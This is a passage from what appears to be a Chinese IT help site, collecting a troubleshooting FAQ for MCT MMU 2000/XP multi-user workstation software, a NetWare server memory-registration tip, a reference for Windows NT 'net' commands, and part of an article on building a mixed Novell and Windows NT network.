e.　　　 在第一位置使用PCI卡启动计算机。更换显示卡启动频率，详细内容参考“MCT硬件/安装/将启动频率改至AGP”中的内容。

4.问题：附加键盘、鼠标不工作

原因/补救措施：

c.　　　 检查在控制台或者设备管理器中是否正确显示并识别了“USB输入设备”。

d.　　　 电缆长度是否超出规定长度，电缆质量是否合格，电缆是否被屏蔽。如果需要的话更换电缆。

e.　　　 将MCT USB或者USB对接器上的键盘和鼠标与第一位置的输入设备更换，然后检查所有的键盘和鼠标是否都已正常工作。

f.　　　　通过控制面板－>软件来检查附加键盘/鼠标驱动程序或附加程序（如罗技三健鼠标）是否已经安装。卸载这些软件。

5.问题：可选声音设备不工作

回答：将MCT置为非活动，然后在重新启动计算机后通过开始－>控制面板－>多媒体和声音－>音频来检查各声音设备。如果在单位置模式下这些设备能够交替地工作，则在MCT下肯定也能正常工作。此外，应当通过开始－>控制面板－>系统－>硬件－>设备管理器－>声卡来检查是不是所有连接的声音设备都被正确识别出来。如果所有设备都已正常工作，则在重新启动后将MCT MMU 2000/XP启动，并在MCT控制台/声音设备（MEDIA #1…n）中将各设备分配给附加位置。

6.问题：为什么安装了MCT MMU 2000/XP 后的windows2000 sever启动时间会比安装了MCT MMU2000/XP后的windows200 prefissional慢很多？甚至各个工作站有类似“死机”的状态？

  回答：这是由于win2000 server在启动时会在后台启动很多服务和服务进程所以导致其各个工作站启动缓慢,然后主机和各个工作站表面看上去是启动完毕,但实际上在后台仍然还有许多服务进程在建立,所要等到1-2分钟,也就是说整个启动过程会是在3-5分钟.这个启动时间和速度也与主机是否安装了跟随主机启动时自启动的软件(既是在任务栏右下角”托盘”中的程序),有很大的关系

当主机与各个工作站启动3-5分钟后,系统速度开始恢复正常,这时打开任务管理器就会发现有比windows professional 多的多的服务进程在后台运行.而 这些进程也就是在系统启动时在后台进行启动的.这也就是导致在系统启动时各个工作站速度缓慢与类似死机状态的原因.

7.问题:为什么安装了MCT MMU 2000/XP 后的windows2000 sever/prefissional/XP会有系统自动重启的现象?该如何解决?

  回答:有两种可能的原因

        一.由于主机的电源功率过低(例如电源功率只有180W).对于这种情况我们建议将电源换掉,我们建议的电源功率是300W或以上.

        二.如果排除第一种情况后,还是有这种现象,那将会是以下的原因所造成的:

            当系统服务程序(例如ftp服务器等)或一些应用软件在系统启动或系统运行过程中出现错误而导致系统失败,这时windows自身会有3种可能的动作,一是将那个错误事件写入系统日志;二是发送管理警报;三是自动重新启动.如果我们将”自动重新启动”屏蔽掉,那么就不会出现这种自动重启的现象.具体步骤如下:

        控制面板→系统→高级→启动和故障恢复中的系统失败一栏,将"自动重新启动"这一项屏蔽掉.

8.问题:我的AGP显卡的芯片是nVidia Riva TNT2 的,PCI显卡也是nVidia Riva TNT2 ,为什么我将AGP(主机)的显卡的驱动版本升级为40.71后,其他的各个工作站都启动不了,而主机却正常启动?该如何解决呢?

  回答:我们不建议用户使用nVidia系列显卡的目前最近的驱动程序版本40.71,因为这将会使其他的工作站无法启动.解决方法则是:将这个新的驱动程序卸载后,重新启动主机,用原来windows2000默认的驱动后,则一切恢复正常.

这个驱动所支持的芯片列表如下:

   nVIDIA RIVA TNT、nVIDIA RIVA TNT2/TNT2 Pro、nVIDIA RIVA TNT2 Ultra、nVIDIA Vanta/Vanta LT、nVIDIA RIVA TNT2 Model 64/Model 64 Pro、nVIDIA Aladdin TNT2、nVIDIA GeForce 256、nVIDIA GeForce DDR、nVIDIA Quadro、nVIDIA GeForce2 MX/MX 400、nVIDIA GeForce2 MX 100/200、nVIDIA Quadro2 MXR/EX、nVIDIA GeForce2 Integrated GPU、nVIDIA GeForce2 GTS/GeForce2 Pro、nVIDIA GeForce2 Ti、nVIDIA GeForce2 Ultra、nVIDIA Quadro2 Pro、nVIDIA GeForce4 MX 460、nVIDIA GeForce4 MX 440、nVIDIA GeForce4 MX 420、nVIDIA Quadro4 500/550 XGL、nVIDIA Quadro4 200/400 NVS、nVIDIA GeForce4 MX 440 with AGP8X、nVIDIA GeForce4 MX 440SE with AGP8X、nVIDIA GeForce4 MX 420 with AGP8X、nVIDIA Quadro4 580 XGL、nVIDIA Quadro4 280 NVS、nVIDIA Quadro4 380 XGL、nVIDIA GeForce4 MX Integrated GPU、nVIDIA GeForce3、nVIDIA GeForce3 Ti 200、nVIDIA GeForce3 Ti 500、nVIDIA Quadro DCC、nVIDIA GeForce4 Ti 4600、nVIDIA GeForce4 Ti 4400、nVIDIA NV25、nVIDIA GeForce4 Ti 4200、nVIDIA Quadro4 900 XGL、nVIDIA Quadro4 750 XGL、nVIDIA Quadro4 700 XGL、nVIDIA GeForce4 Ti 4600 with AGP8X、nVIDIA GeForce4 Ti 4200 with AGP8X、nVIDIA Quadro4 980 XGL、nVIDIA Quadro4 780 XGL、nVIDIA NV30、nVIDIA NV30、nVIDIA NV30GL、nVIDIA NV30GL

PS:版本40.71是9月27日发布的

如果因为这个版本的驱动而导致其他工作站不能启动,那么只要将这个驱动卸载掉,然后重新启动主机,使用windows2000默认的即可.(前提是PCI显卡也要是TNT2的芯片)

9.问题:为什么我安装MCT MMU 2000/XP 后,只有主机能启动正常,而其他工作站则都不能启动?

  回答:如果你的主机使用的AGP显卡芯片是nVidia Riva TNT2 ,而其他各个工作站的PCI显卡芯片也同样是nVidia Riva TNT2的,请参考问题8.

10.问题：如何设置虚拟内存，使系统达到更优效果？

  回答: 进入“控制面板”中，然后双击“系统”选项，在出现的对话框中单击“性能选项”（图一）。

在图一的对话框中单击“更改”选项后，如（图二）所示：

（图二）

在图二中我们可以看到“驱动器 [卷标]”C：已经被设置了“页面文件大小（MB）”，但驱动器D并没有被设置，我们可以单击这个对话框中的“设置”来进行设置，那么“初始大小（MB）”与“最大值（MB）”可以设置成与“驱动器C”一样，当设置成功后，“所有驱动器页面文件大小总数”将会发生变化，最后单击“确定”完成设置。

Windows 2000对于内存的管理同Windows 9x略有不同——它或者可以对应用程序的性能进行优化，或者对后台服务进行优化。如果你的Windows2000只是作为一个个人操作系统来使用，那么使用Windows2000默认的选择就可以了——windows2000默认就是针对应用程序进行优化的。

11．问题：关于网络部分是否需要对每个工作站（MMU）进行单独的设置？

回答: 不用，但每个工作站是保持独立的。

12．问题：对主机的注销设定是否会影响到其他工作站（MMU）的使用和工作？

回答:不会，每个工作站都是保持独立的。

13．问题：如何查看各个工作站的PCI显卡信息？

回答:在桌面上单击鼠标右键，选择属性，在出现的视窗中选择“高级”选项，在选择“适配器”选项后，如下图所示：

14．问题：为什么我的系统有时会自动重起？

回答：可能的原因是由于系统自身或其他应用软件的错误导致系统失败，通常的解决方法如下：

右击我的电脑，选择属性\高级\启动和故障恢复，即可进入如下界面（图一）：

（图一）

在“系统失败”的标题下，将“自动重新启动”这个选项前的对钩去掉，这样当系统遇到自身或其他错误而失败时不会自动重启。

15．问题：为什么我的AGP和PCI显卡的显示顺序错误？

回答：通常修改BOIS的设置来避免这一错误，具体修改如下：

      开机后进入BOIS画面，选择INTEGRATED PERIPHERALS选项，进入该选项后，

将INIT DISPLAY FIRST选项设置为AGP即可。（适用于AWARDBOIS）

16．问题：我的主机AGP显卡是NVIDIA系列的，PCI则是ATI的，为什么启动主机后出现马赛克无法显示？

回答：这是由于主机AGP显卡与其他工作站PCI显卡芯片不一致所导致的，建议用户使用同一显示芯片的显卡。

17．问题：在使用的过程中，个别的工作站死机（键盘及鼠标都不能使用），这种情况该如何解决？

    回答：通过主机的控制台软件（MCT CONTROL）来对其进行操作。
返回


NETWARE服务器随机存储器的扩展

《一键清理系统垃圾》

NETWARE服务器随机存储器的扩展

    去朋友单位时发现，该单位NETWARE服务器内存由16M升为32M，但性能没有多大改善，服务器硬盘仍然转个不停，究其原因发现其硬件内存方面虽然升级了，但NETWARE服务器内存设置没有任何改变。
    NETWARE服务器最大支持4G的随机存储器，当随机存储器低于16M时，NETWARE系统自动进行管理，而大于16M时，需进行随机存储器扩展，也就是说即使用户在安装服务器时已安装好了大于16M的内存，而NETWARE也只能用上16M内存。
    让NETWARE使用多于16M通常有两个办法：
    1.建立DOS配置文件，在CONFIG.SYS其中加载设备驱动程序HIMEM.SYS。以硬盘起动为例：在C盘根目录下建立CONFIG.SYS文件，仅一行DEVICE=C:\DOS\HIMEM.SYS即可。
    2.在控制台下使用REGISTER进行内存注册。以32M内存为例，具体方法是：在控制台下键入REGISTER MEMORY 1000000 1000000，前一个1000000是后16M的起始地址，后一个1000000是后16M的内存长度，可以在控制台下键入MEMORY命令检测注册是否成功，注册成功应显示：Total server memory:32,＊＊＊ Kilobytes。如果想长期有效，可将其写入AUTOEXEC.NCF中，即在控制台下键入LOAD INSTALL，选择System Options再选择Edit AUTOEXEC.NCF ，在load monitor命令行的前一行写入REGISTER MEMORY 1000000 1000000。退出服务器后重新启动服务器，这时你会看到服务器各缓冲参数都有较大提高。
    以下是前后对比情况表：(仅供参考，以下数值会因加载.NLM文件有所不同)
    服务器中缓存数越大，可读文件的空间就越大，服务器硬盘读数压力就越小，看来用REGISTER注册各缓存数量最大，当然性能最优。
    运行环境：NETWARE 3.12 内存 32M

返回


net命令详解

《一键清理系统垃圾》

net命令详解

许多 Windows NT 网络命令以 net 开始。这些 net 命令有一些公共属性：
通过键入 net /? 可查阅所有可用的 net 命令。
通过键入 net help 命令可在命令行中获得 net 命令的语法帮助。例如，要得到 net acco
unts 命令的帮助，请键入 net help accounts。
所有 net 命令接受选项 / yes 和 /no（可缩写为 / y 和 /n ）。/ y 对命令产生的任何交
互提示自动回答“是”，/n 回答“否”。例如，net stop server 通常提示确认是否根据服
务器服务结束所有服务，net stop server /y 自动回答“是”并关闭服务器服务。
Net Accounts
更新用户帐号数据库、更改密码及所有帐号的登录要求。必须要在更改帐号参数的计算机上
运行网络登录服务。
net accounts [/forcelogoff:{minutes | no}] [/minpwlen:length] [/maxpwage:{days |
unlimited}] [/minpwage:days] [/uniquepw:number] [/domain]
net accounts [/sync] [/domain]
参数
无
键入不带参数的 net accounts，将显示当前密码设置、登录时限及域信息。
/forcelogoff:{minutes | no}
设置当用户帐号或有效登录时间过期时，结束用户和服务器会话前的等待时间。no 选项禁止
强行注销。该参数的默认设置为 no。
指定 /forcelogoff:minutes 之后，Windows NT 在其强制用户退出网络 minutes 分钟之前
，将给用户发出警报。如果还有打开的文件，Windows NT 将警告用户。如果 minutes 小于
两分钟，Windows NT 警告用户立即从网络注销。
/minpwlen:length
设置用户帐号密码的最少字符数。允许范围是 0-14，默认值为 6。
/maxpwage:{days | unlimited}
设置用户帐号密码有效的最大天数。unlimited 不设置最大天数。/maxpwage 选项的天数必
须大于 /minpwage。允许范围是 1-49,710 天 (unlimited)。默认值为 90 天。
/minpwage:days
设置用户必须保持原密码的最小天数。 0 值不设置最小时间。允许范围是 0-49,710 天，默
认值为 0 天。
/uniquepw:number
要求用户更改密码时，必须在经过 number 次后，才能重复使用与之相同的密码。允许范围
是 0-8。默认值为 5。
/domain
在当前域的主域控制器上执行该操作。否则只在本地计算机执行操作。
该参数仅用于 Windows NT Server 域中的 Windows NT Workstation 计算机，Windows NT
Server 计算机默认为在主域控制器执行操作。
/sync
当用于主域控制器时，该命令使域中所有备份域控制器同步；当用于备份域控制器时，该命
令仅使该备份域控制器与主域控制器同步。该命令仅适用于 Windows NT Server 域成员的计
算机。
Net Computer
从域数据库中添加或删除计算机。该命令仅在运行 Windows NT Server 的计算机上可用。
net computer \computername {/add | /del}
参数
\computername
指定要添加到域或从域中删除的计算机。
/add
将指定计算机添加到域。
/del
将指定计算机从域中删除。
Net Config
显示当前运行的可配置服务，或显示并更改某项服务的设置。
net config [service [options]]
参数
无
键入不带参数的 net config 将显示可配置服务的列表。
service
通过 net config 命令进行配置的服务（server 或 workstation）。
options
服务的特定选项。完整语法请参阅 net config server 或 net config workstation。
Net Config Server
运行服务时显示或更改服务器的服务设置。
net config server [/autodisconnect:time] [/srvcomment:"text "] [/hidden:{yes | n
o}]
参数
无
键入不带参数的 net config server，将显示服务器服务的当前配置。
/autodisconnect:time
设置断开前用户会话闲置的最大时间值。可以指定 -1，表示永不断开连接。允许范围是 -1
-65535 分钟，默认值是 15 分钟。
/srvcomment:"text "
为服务器添加注释，可以通过 net view 命令在屏幕上显示所加注释。注释最多可达 48 个
字符，文字要用引号引住。
/hidden:{yes | no}
指定服务器的计算机名是否出现在服务器列表中。请注意隐含某个服务器并不改变该服务器
的权限。默认为 no。
Net Config Workstation
服务运行时，显示或更改工作站各项服务的设置。
net config workstation [/charcount:bytes] [/chartime:msec] [/charwait:sec]
参数
无
键入不带参数的 net config workstation 将显示本地计算机的当前配置。
/charcount:bytes
指定 Windows NT 在将数据发送到通讯设备之前收集的数据量。如果同时设置 /chartime:m
sec 参数，Windows NT 按首先满足条件的选项运行。允许范围是 0-65535 字节，默认值是
16 字节。
/chartime:msec
指定 Windows NT 在将数据发送到通讯设备之前收集数据的时间。如果同时设置 /charcoun
t:bytes 参数，Windows NT 按首先满足条件的选项运行。允许范围是 0-65535000 毫秒，默
认值是 250 毫秒。
/charwait:sec
设置 Windows NT 等待通讯设备变为可用的时间。允许的范围是 0-65535 秒，默认值是 36
00 秒。
Net Continue
重新激活挂起的服务。
net continue service
参数
service
能够继续运行的服务，包括： file server for macintosh（该服务仅限于 Windows NT Se
rver）, ftp publishing service, lpdsvc, net logon, network dde，network dde dsdm
，nt lm security support provider，remoteboot（该服务仅限于 Windows NT Server），
remote access server, schedule，server，simple tcp/ip services 及 workstation 。
Net File
显示某服务器上所有打开的共享文件名及锁定文件数。该命令也可以关闭个别文件并取消文
件锁定。
net file [id [/close]]
参数
无
键入不带参数的 net file 可获得服务器上打开文件的列表。
id
文件标识号。
/close
关闭打开的文件并释放锁定记录。请从共享文件的服务器中键入该命令。
Net Group
在 Windows NT Server 域中添加、显示或更改全局组。该命令仅在 Windows NT Server 域
中可用。
net group [groupname [/comment:"text "]] [/domain]
net group groupname {/add [/comment:"text "] | /delete} [/domain]
net group groupname username [ ...] {/add | /delete} [/domain]
参数
无
键入不带参数的 net group 可以显示服务器名称及服务器的组名称。
groupname
要添加、扩展或删除的组。仅提供某个组名便可查看组中的用户列表。
/comment:"text "
为新建组或现有组添加注释。注释最多可以是 48 个字符，并用引号将注释文字引住。
/domain
在当前域的主域控制器中执行该操作，否则在本地计算机上执行操作。
该参数仅用于作为 Windows NT Server 域成员的 Windows NT Workstation 计算机。Windo
ws NT Server 计算机默认为在主域控制器中操作。
username[ ...]
列表显示要添加到组或从组中删除的一个或多个用户。使用空格分隔多个用户名称项。
/add
添加组或在组中添加用户名。必须使用该命令为添加到组中的用户建立帐号。
/delete
删除组或从组中删除用户名。
Net Help
提供网络命令列表及帮助主题，或提供指定命令或主题的帮助。可用网络命令列于 N 下面的
“命令参考”中“命令”窗口内。
net help [command]
net command {/help | /?}
参数
无
键入不带参数的 net help 显示能够获得帮助的命令列表和帮助主题。
command
需要其帮助的命令，不要将 net 作为 command 的一部分。
/help
提供显示帮助文本方式选择。
/?
显示命令的正确语法。
Net Helpmsg
提供 Windows NT 错误信息的帮助。
net helpmsg message#
参数
message#
需要其帮助的 Windows NT 消息的四位代码。
Net Localgroup
添加、显示或更改本地组。
net localgroup [groupname [/comment:"text "]] [/domain]
net localgroup groupname {/add [/comment:"text "] | /delete} [/domain]
net localgroup groupname name [ ...] {/add | /delete} [/domain]
参数
无
键入不带参数的 net localgroup 将显示服务器名称和计算机的本地组名称。
groupname
要添加、扩充或删除的本地组名称。只提供 groupname 即可查看用户列表或本地组中的全局
组。
/comment: "text "
为新建或现有组添加注释。注释文字的最大长度是 48 个字符，并用引号引住。
/domain
在当前域的主域控制器中执行操作，否则仅在本地计算机上执行操作。
该参数仅应用于 Windows NT Server 域中的 Windows NT Workstation 计算机。Windows N
T Server 计算机默认为在主域控制器中操作。
name [ ...]
列出要添加到本地组或从本地组中删除的一个或多个用户名或组名，多个用户名或组名之间
以空格分隔。可以是本地用户、其他域用户或全局组，但不能是其他本地组。如果是其他域
的用户，要在用户名前加域名（例如，SALESRALPHR）。
/add
将全局组名或用户名添加到本地组中。在使用该命令将用户或全局组添加到本地组之前，必
须为其建立帐号。
/delete
从本地组中删除组名或用户名。
Net Name
添加或删除消息名（有时也称别名），或显示计算机接收消息的名称列表。要使用 net nam
e 命令，计算机中必须运行信使服务。
net name [name [/add | /delete]]
参数
无
键入不带参数的 net name 将列出当前使用的名称。
name
指定接收消息的名称。名称最多为 15 个字符。
/add
将名称添加到计算机中。 /add 是可选项，键入 net name name 与键入 net name name /a
dd 相同。
/delete
从计算机中删除名称。
Net Pause
暂停正在运行的服务。
net pause service
参数
service
指下列服务： file server for macintosh（仅限于 Windows NT Server）、ftp publishi
ng service、lpdsvc、net logon、network dde、network dde dsdm、nt lm security sup
port provider、remoteboot（仅限于 Windows NT Server）、remote access server、sch
edule、server、simple tcp/ip services 或 workstation 。
Net Print
显示或控制打印作业及打印队列。
net print \computername sharename
net print [\computername ] job# [/hold | /release | /delete]
参数
computername
共享打印机队列的计算机名。
sharename
打印队列名称。当包含 computername 与 sharename 时，使用反斜杠 () 将它们分开。
job#
在打印机队列中分配给打印作业的标识号。有一个或多个打印机队列的计算机为每个打印作
业分配唯一标识号。如果某个作业号用于共享打印机队列中，则不能指定给其他作业，也不
能分配给其他打印机队列中的作业。
/hold
使用 job# 时，在打印机队列中使打印作业等待。打印作业停留在打印机队列中，并且其他
打印作业只能等到释放该作业之后才能进入。
/release
释放保留的打印作业。
/delete
从打印机队列中删除打印作业。
Net Send
向网络的其他用户、计算机或通信名发送消息。要接收消息必须运行信使服务。
net send {name | * | /domain[:name] | /users} message
参数
name
要接收发送消息的用户名、计算机名或通信名。如果计算机名包含空字符，则要将其用引号
(" ") 引住。
*
将消息发送到组中所有名称。
/domain[:name]
将消息发送到计算机域中的所有名称。如果指定 name，则消息将发送到指定域或组中的所有
名称。
/users
将消息发送到与服务器连接的所有用户。
message
作为消息发送的文本。
Net Session
列出或断开本地计算机和与之连接的客户端的会话。
net session [\computername] [/delete]
参数
无
键入不带参数的 net session 可以显示所有与本地计算机的会话的信息。
\computername
标识要列出或断开会话的计算机。
/delete
结束与 \computername 计算机会话并关闭本次会话期间计算机的所有打开文件。如果省略
\computername 参数，将取消与本地计算机的所有会话。
Net Share
创建、删除或显示共享资源。
net share sharename
net share sharename=drive:path [/users:number | /unlimited] [/remark:"text"]
net share sharename [/users:number | unlimited] [/remark:"text"]
net share {sharename | drive:path} /delete
参数
无
键入不带参数的 net share 将显示本地计算机上所有共享资源的信息。
sharename
是共享资源的网络名称。键入带 sharename 的 net share 命令，只显示该共享信息。
drive:path
指定共享目录的绝对路径。
/users:number
设置可同时访问共享资源的最大用户数。
/unlimited
不限制同时访问共享资源的用户数。
/remark:"text "
添加关于资源的注释，注释文字用引号引住。
/delete
停止共享资源。
Net Start
启动服务，或显示已启动服务的列表。如果服务名是两个或两个以上的词，如 Net Logon 或
Computer Browser，则必须用引号 (") 引住。.
net start [service]
参数
无
键入不带参数的 net start 则显示运行服务的列表。
service
包括下列服务： alerter、client service for netware、clipbook server、computer br
owser、dhcp client 、directory replicator 、eventlog 、ftp publishing service 、
lpdsvc、messenger 、net logon 、network dde 、network dde dsdm 、network monitor
ing agent 、nt lm security support provider 、ole 、remote access connection man
ager 、remote access isnsap service 、remote access server 、remote procedure ca
ll (rpc) locator 、remote procedure call (rpc) service 、schedule 、server 、sim
ple tcp/ip services 、snmp、spooler 、tcp/ip netbios helper 、ups 及 workstation
。
下列服务仅在 Windows NT Server 下可用：file server for macintosh、gateway servic
e for netware、microsoft dhcp server、print server for macintosh、remoteboot、wi
ndows internet name service 。
Net Statistics
显示本地工作站或服务器服务的统计记录。
net statistics [workstation | server]
参数
无
键入不带参数的 net statistics 将列出其统计信息可用的运行服务。
workstation
显示本地工作站服务的统计信息。
server
显示本地服务器服务的统计信息。
Net Stop
停止 Windows NT 网络服务。
net stop service
参数
service
包括下列服务： alerter（警报）、client service for netware（Netware 客户端服务）
、clipbook server（剪贴簿服务器）、computer browser（计算机浏览器）、directory r
eplicator（目录复制器）、ftp publishing service (ftp )（ftp 发行服务）、lpdsvc、
messenger（信使）、net logon（网络登录）、network dde（网络 dde）、network dde d
sdm（网络 dde dsdm）、network monitor agent（网络监控代理）、nt lm security supp
ort provider（NT LM 安全性支持提供）、ole（对象链接与嵌入）、remote access conne
ction manager（远程访问连接管理器）、remote access isnsap service（远程访问 isns
ap 服务）、remote access server（远程访问服务器）、remote procedure call (rpc) l
ocator（远程过程调用定位器）、remote procedure call (rpc) service（远程过程调用服
务）、schedule（调度）、server（服务器）、simple tcp/ip services（简单 TCP/IP 服
务）、snmp、spooler（后台打印程序）、tcp/ip netbios helper（TCP/IP NETBIOS 辅助工
具）、ups 及 workstation（工作站）。
下列服务仅在 Windows NT Server 中可用： file server for macintosh、gateway servi
ce for netware、microsoft dhcp server、print server for macintosh、remoteboot、w
indows internet name service。
Net Time
使计算机的时钟与另一台计算机或域的时间同步。不带 /set 参数使用时，将显示另一台计
算机或域的时间。
net time [\computername | /domain[:name]] [/set]
参数
\computername
要检查或同步的服务器名。
/domain[:name]
指定要与其时间同步的域。
/set
使本计算机时钟与指定计算机或域的时钟同步。
Net Use
连接计算机或断开计算机与共享资源的连接，或显示计算机的连接信息。该命令也控制永久
网络连接。
net use [devicename | *] [\computernamesharename[volume]] [password | *]] [/user
:[domainname]username] [[/delete] | [/persistent:{yes | no}]]
net use devicename [/home[password | *]] [/delete:{yes | no}]
net use [/persistent:{yes | no}]
参数
无
键入不带参数的 net use 将列出网络连接。
devicename
指定要连接到的资源名称或要断开的设备名称。有两类设备名：磁盘驱动器（D: 到 Z:）和
打印机（LPT1: 到 LPT3）。若键入星号而不是指定设备名将分配下一个可用设备名。
\computernamesharename
服务器及共享资源的名称。如果计算机名包含空白字符，要用引号 (" ") 将双反斜线及计算
机名引住。计算机名长度可以是 1-15 个字符。
volume
指定服务器上的 NetWare 卷。要连接到 NetWare 服务器，必须安装并运行 NetWare 客户机
服务 (Windows NT Workstation) 或 NetWare 网关服务 (Windows NT Server)。
password
访问共享资源的密码。
*
提示键入密码。在密码提示行中键入密码时，将不显示该密码。
/user
指定进行连接的另外一个用户。
domainname
指定另一个域。例如 net use d: \servershare /user:adminmariel 连接用户 mariel，如
同从 admin 域连接一样。如果省略域，将使用当前登录域。
username
指定登录的用户名。
/home
将用户连接到其宿主目录。
/delete
取消指定网络连接。如果用户以星号指定连接，则取消所有网络连接。
/persistent
控制永久网络连接的使用。默认为上次使用的设置。无设备的连接不是永久的。
yes
保存建立的所有连接，并在下次登录时还原。
no
不保存建立的连接和继发连接，并在下次登录时还原现有连接。使用 /delete 开关项取消永
久连接。
Net User
添加或更改用户帐号或显示用户帐号信息。
net user [username [password | *] [options]] [/domain]
net user username {password | *} /add [options] [/domain]
net user username [/delete] [/domain]
参数
无
键入不带参数的 net user 将查看计算机上的用户帐号列表。
username
添加、删除、更改或查看用户帐号名。用户帐号名最多可以有 20 个字符。
password
为用户帐号分配或更改密码。密码必须满足在 net accounts 命令 /minpwlen 选项中设置的
最小参数。最多是 14 个字符。
*
提示输入密码。在密码提示行中键入密码时，将不显示该密码。
/domain
在计算机主域的主域控制器中执行操作。
该参数仅在 Windows NT Server 域成员的 Windows NT Workstation 计算机上可用。默认情
况下，Windows NT Server 计算机在主域控制器中执行操作。
注意：在计算机主域的主域控制器发生该动作。它可能不是登录域。
/add
将用户帐号添加到用户帐号数据库。
/delete
从用户帐号数据库中删除用户帐号。
选项如下所示：
/active:{no | yes}
启用或禁止用户帐号。如果不激活用户帐号，用户就不能访问计算机上的资源。默认值是 y
es （激活）。
/comment:"text"
提供用户帐号的注释。该注释最多可以有 48 个字符，文字用引号引住。
/countrycode:nnn
使用操作系统的国家代码以便为用户帮助和错误信息文件提供指定语言文件。0 值表示默认
国家代码。
/expires:{date | never}
如果设置 date，将导致用户帐号过期，never 不对用户帐号设置时间限制。过期日期根据
/countrycode 值可以是下列格式： mm/dd/yy、dd/mm/yy 或 mmm, dd, yy。注意帐号在指定
日期开始时过期。月份可以是数字、全名或三个字母的简拼。年可以是两位或四位数，使用
逗号或斜线（不要用空格） 区分日期的各部分。如果省略 yy ，则使用该日期下一次到来的
年份（根据计算机的时钟）。例如如果在 1994 年 1 月 10 日到 1995 年 1 月 8 日之间输
入下列日期项，那它们相同：jan,9
1/9/95
january,9,1995
1/9
/fullname:"name"
指定用户全名而不是用户名。用引号将名字引住。
/homedir:path
设置用户宿主目录的路径。该路径必须存在。
/homedirreq:{yes | no}
设置是否需要宿主目录。
/passwordchg:{yes | no}
指定用户是否能改变自己的密码。默认值是 yes。
/passwordreq:{yes | no}
指定用户帐号是否需要密码，默认值是 yes。
/profilepath:[path]
设置用户登录配置文件的路径。该路径名指向注册表配置文件。
/scriptpath:path
为用户登录脚本设置路径。Path 不能是绝对路径；
path 是相对于 %systemroot%SYSTEM32REPLIMPORTSCRIPTS 的相对路径：。
/times:{times | all}
指定允许用户使用计算机的时间。times 值表示为 day[-day][, day[-day]] , time[-time
][, time[-time]], 增量限制为一小时。Days 可以是全名或简写（M、T、W、Th、F、Sa、S
u）。Hours 可以是 12 小时制或 24 小时制。对于 12 小时值，使用 AM、PM 或 A.M、P.M
。all 表示用户总可以登录。空值表示用户永远不能登录。用逗号分隔日期和时间，分隔时
间和日期的单位用分号（例如 M,4AM-5PM; T,1PM-3PM）。指定 /times 时不要使用空格。
/usercomment:"text "
让管理员添加或更改帐号的“用户注释”。用引号引住文字。
/workstations:{computername[,...] | *}
列出最多八个用户可以登录到网络的工作站。用逗号分隔列表中的多个项。如果 /workstat
ions 没有列表，或如果列表是星号“*”，则用户可以从任何一台计算机登录。
Net View
显示域列表、计算机列表或指定计算机的共享资源列表。
net view [\computername | /domain[:domainname]]
net view /network:nw [\computername]
参数
无
键入不带参数的 net view 将显示当前域的计算机列表。
\computername
指定要查看其共享资源的计算机。
/domain[:domainname]
指定要查看其可用计算机的域。如果省略 domainname ，则显示网络的所有域。
/network:nw
显示 NetWare 网络中所有可用的服务器。如果指定计算机名，则显示 NetWare 网络中该计
算机的可用资源。也可以用此开关指定添加到系统中的其他网络。


Novell和Windows NT混合网的组建

《一键清理系统垃圾》

Novell和Windows NT混合网的组建

      Novell网络和Windows NT网络是目前局域网中应用极为广泛的两种网络类型，这两种网络的单独规划和设计是大家较为熟悉的，但怎样将两者有机结合，互享系统资源，则是本文所要介绍的。本文所讲的“混合型网络”有两层含义，其一是指网络类型既包含Novell网也包含Windows NT网，其二是指网络的拓扑结构是总线型网络和星型网络的共存。文章以本单位所建的一个混合型网络为例，从网络的规划和选型、硬件的选择和连接、同时登录两个不同网络的工作站的设置等方面做以下介绍。
    一、网络的规划和选型
    1.网络的地理分布和用途
    此混合网络主要分布在办公大楼和教学大楼两处，且办公楼与教学楼相距较近，仅有80米左右。教学楼设有一个计算机房，主要供学生上机使用，有机器60多台(其中无硬盘286、386微机10多台),早已联网；办公楼也设有一个计算机房，供教师使用，现共有486以上的微机15台。
    2.混合局域网的设计和规划
    综合考虑网络的用途、现有机器的类型以及网络的安全等因素，网络规划为：因学生用机的部分硬件设备较差，为了充分利用所有硬件资源，保留原有的网络系统。办公楼的15台微机因硬件设备较好，同时主要是用于计算机教师的软件开发和对其他教师的培训，因而将这15台微机联成一个小型局域网。当两个局域网分别规划好后，便可进行两者的混连规划。其网络的整体规划结构如图1：
    3.网络的选型和连接
    教学楼部分保留原有的NetWare 3.12网络系统，由一个网络服务器带4个16口的HUB，每个HUB接16台微机，60余台微机全部连入此网络；办公楼的15台微机组建成Windows NT网，15台工作站以总线型结构采用同轴电缆线串联在NT服务器上。同时，用双绞线将这15台工作站以星型结构连接在由NetWare网引出的一个24口HUB上(15个工作站采用24口HUB连接是为了便于将来的扩充)。这样，一个网卡便连有两条网络连线，同时整个网络的拓扑结构基本上是以总线型网络为主干，以星型网为分支的混合型网络。
    二、网络服务器的安装
    1.对NetWare 3.12服务器的改造
    NetWare 3.12服务器已装有一个网卡，再连入15台工作站后，为了减轻一个网卡过重的工作负担，需再给服务器安装一个网卡，此网卡最好与原有的网卡同型号(16BIT，NE2000兼容卡)。为了能使一个服务器中的两个网卡都能同时工作，在将两个网卡安装好后，需修改服务器上的Autoexec.NCF文件，使每个网卡占用一个IRQ值，以防止地址冲突，而且不同的网卡需要有不同的Int与Port值。以下是安装两个网卡后的Autoexec.NCF文件的内容：
    File server Name XYW
    IPX Internal Net 199801
    Load NE2000 Port=300 Int=3 Frame=Ether_802.3 Name=NCI1
    Bind IPX to NCI1 Net=A
    Load NE2000 Port=320 Int=5 Frame=Ether_802.3 Name=NCI2
    Bind IPX to NCI2 Net=B
    Mount all
    Load Monitor
    2.Windows NT网络服务器的安装
    NT网络服务器采用一台Pentium 200 CPU、3.2G硬盘、64MB RAM的兼容机为服务器，网卡为32BIT双口(具有RJ－45接口和BNC接头)的PCI卡(带有NT4.0的网卡驱动程序)。网络操作系统为中文Windows NT Server 4.0。具体的安装过程请参考有关指导书，不过为了顺利地安装和维护，提以下几点建议：
    (1)将“服务器类型”选为“主域控制器(PDC)”；
    (2)虽然NT4.0自身提供了大量的网卡驱动程序，但为了能够正确安装，最好使用网卡自带的驱动程序；并记下网卡在没有冲突时的IRQ 和I/O的值；
    (3)网络协议选择为NWlink和NetBEUI两种；
    (4)输入并记下服务器的“域名”；
    (4)为了日后网络服务器维护的方便，最好制作一张紧急修复磁盘。
    三、NT工作站的安装
    虽然可以由DOS、Windows3.x、Windows NT Workstation和Windows95等工作站登录到Windows NT Server 4.0服务器，但笔者在实际安装中认为Windows95可以说是NT4.0最佳的工作站操作系统。同时这15台NT工作站必须要同时登录到Windows NT和NetWare网络，因而15台工作站全部选择用Windows95登录。
